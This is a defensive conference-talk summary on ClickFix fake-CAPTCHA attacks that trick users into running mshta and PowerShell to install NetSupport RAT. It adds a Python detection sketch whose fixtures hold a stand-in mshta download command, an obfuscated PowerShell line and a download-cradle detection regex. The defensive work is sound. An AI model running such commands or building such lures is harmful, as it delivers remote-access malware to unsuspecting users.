Ghost in the Clipboard: Investigating ClickFix as an Initial Infection Routine

Johnny Westfall · 24:49 · 2025 · Track 2

Tags: incident-response, blue-team, threat-intel

Johnny Westfall on Ghost in the Clipboard. A Track 2 session from Simply CyberCon 2025.

Ghost in the Clipboard: ClickFix as the New Phishing

Johnny Westfall, an MDR analyst at Unit 42, wants you to hate CAPTCHAs by the time he is done. ClickFix is a social engineering technique that tricks users into copying a malicious command and pasting it into the Windows Run dialog. Since it appeared in late 2024 delivering Lumma Stealer, it has surged 500 percent and is now the second most common attack method behind phishing.

Meet Dwight

Johnny investigates a fictional user named Dwight who treats every CAPTCHA as a personal challenge to prove he is not a robot. Dwight encounters what looks like a normal verify-you-are-human page. The instructions tell him to hit Windows+R, paste, and press Enter. What he actually pastes is a command that launches mshta.exe (Microsoft HTML Application Host), which then spawns PowerShell, pulls down a payload from a remote server, drops NetSupport RAT into persistence via a Run registry key, hides the install path with attrib +h, and starts client32.exe on every login.

The Process Tree Tells the Story

Walking the chain in EDR: explorer.exe spawns mshta.exe, which spawns PowerShell with an obfuscated command that creates a WebClient and invokes whatever is at b.png (which is not a PNG). The smoking guns are mshta making outbound network connections (it should not), PowerShell executing remote content from an obfuscated command line, and NetSupport running from an abnormal path. NetSupport itself is not malware; it is a legitimate remote admin tool used by schools and universities, which is exactly why attackers picked it. The Explorer RunMRU registry key holds the receipts: it logs what the user typed into Run, including the spoofed verify-you-are-a-human command.
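The three process-tree indicators and the RunMRU check above, as an added detection sketch that is not part of the talk: it runs over constructed EDR-style process events and a constructed RunMRU value set, so field names, the placeholder command lines and the assumed RunMRU layout (one-letter values ending in `\1`, MRUList most-recent-first) are mine, not Unit 42's.

```python
import re

# Constructed process-creation events in an EDR-like shape (not real telemetry).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe", "net": False},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://verify.example.invalid/", "net": True},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc <REDACTED>", "net": True},
    {"pid": 400, "ppid": 300, "image": r"C:\Users\dwight\AppData\Roaming\xyz\client32.exe",
     "cmdline": "client32.exe", "net": True},
    # A legitimately installed NetSupport client, which should not be flagged.
    {"pid": 500, "ppid": 1,   "image": r"C:\Program Files (x86)\NetSupport\client32.exe",
     "cmdline": "client32.exe", "net": True},
]

# Constructed RunMRU values: assumed layout is one-letter value names whose data
# ends in "\1", with MRUList giving the letters most-recent-first.
RUNMRU = {"MRUList": "ba", "a": "notepad\\1",
          "b": "mshta https://verify.example.invalid/\\1"}

OBFUSCATED_PS = re.compile(r"(-enc|bypass|hidden|webclient|downloadstring|\biex\b)", re.I)
RUN_LOLBINS = re.compile(r"\b(mshta|powershell|cmd)\b", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_clickfix_indicators(events):
    """Return (pid, reason) for each of the three smoking guns in the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = basename(parent["image"]) if parent else ""
        if name == "mshta.exe" and e["net"]:
            findings.append((e["pid"], "mshta.exe made an outbound network connection"))
        if name == "powershell.exe" and pname == "mshta.exe" and OBFUSCATED_PS.search(e["cmdline"]):
            findings.append((e["pid"], "powershell.exe spawned by mshta.exe with obfuscated/download command line"))
        if name == "client32.exe" and not e["image"].lower().startswith(r"c:\program files"):
            findings.append((e["pid"], "NetSupport client32.exe running from abnormal path"))
    return findings

def runmru_entries(values):
    """Run-dialog history, most recent first, with the trailing \\1 stripped."""
    return [values[k].removesuffix("\\1") for k in values.get("MRUList", "") if k in values]

def suspicious_runmru(values):
    """RunMRU entries that invoke a script host the Run dialog rarely needs."""
    return [c for c in runmru_entries(values) if RUN_LOLBINS.search(c)]
```

On a live host the same logic would be fed from exported process telemetry and from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU for each user profile.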

Why It Works and How to Stop It

ClickFix works because users have been trained for years not to click sketchy links and not to download random files, but they have also been trained to robotically complete CAPTCHAs to get on with their day. They are not inspecting the source. Johnny's defense is unglamorous: GPO to block PowerShell for users who do not need it, GPO to block the Run dialog for the same population, and continuous user training, because in six months ClickFix will look different but the underlying pattern of tricking users into running attacker code will not.

Who Should Watch

SOC and MDR analysts who are seeing a lot of mshta or PowerShell alerts and want a clean reference for the chain. Detection engineers building hunts on RunMRU and unusual mshta network behavior. Awareness teams trying to convince leadership that CAPTCHA literacy is now a security topic.